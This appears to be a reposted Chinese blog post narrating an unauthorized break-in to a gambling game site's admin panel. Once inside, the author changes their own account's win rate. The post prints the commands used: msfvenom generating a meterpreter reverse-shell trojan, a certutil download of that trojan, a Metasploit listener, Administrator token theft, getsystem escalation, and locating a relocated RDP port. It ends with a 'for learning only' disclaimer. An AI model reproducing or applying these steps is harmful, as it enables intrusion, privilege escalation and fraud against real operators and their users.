0x01 前言
在某某附近人发来送¥的邀请截图,在棋牌捕鱼上面把赠送的金额打光之后、随之来做个渗透测试....通过意见反馈打到后台地址以及cookie过期....之后0x02 开始渗透
咦....直接进去了。随后把账户的胜利调到了百分比突然感觉好像有点什么不对,,,,咱是来做渗透的不是来捕鱼的吧后台没有上传点 配置文件也不知道路径在哪 ...有点棘手我们回到登陆框 在账户上加个单引号试试看看有没有sqlimsfvenom -p windows/meterpreter/reverse_tcp lhost="外网ip地址" lport="监听端口" -f exe > msf.exe 生成木马
certutil.exe -urlcache -split -f “木马下载地址” C:\test\test.exe
设置使用exploit/multi/handler模块set LHOST “外网ip” //于木马的ip一致
set LPORT "端口" //于木马的监听端口一致
使用impersonate_token "WIN-IGSV8O3CA7E\Administrator" 盗取 administrator 令牌 getuid查看一下嘿嘿嘿 最最最后使用getsystem来获取system权限美滋滋的~~内部出现错误 咋回事了....难道远程端口被改了吗。。。。没有开放3389 ...... 确定以及肯定是改端口了我们回到shell看看找到svchost.exe进程下termservice服务对应的PID根据PID号查找对应远程端口,远程端口为5566端口Very Good~ 0x03 链接获取
原文链接:https://forum.90sec.com/t/topic/945黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
多一个点在看多一条小鱼干
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650571922&idx=4&sn=d9d0ab3f9bbc1a3aa44562a60a7aa5ca&chksm=83bde176b4ca68605026fc7477101e38b713acfc6d0566b3ae2824fdd08fb797d23a92cbf956#rd
如有侵权请联系:admin#unsafe.sh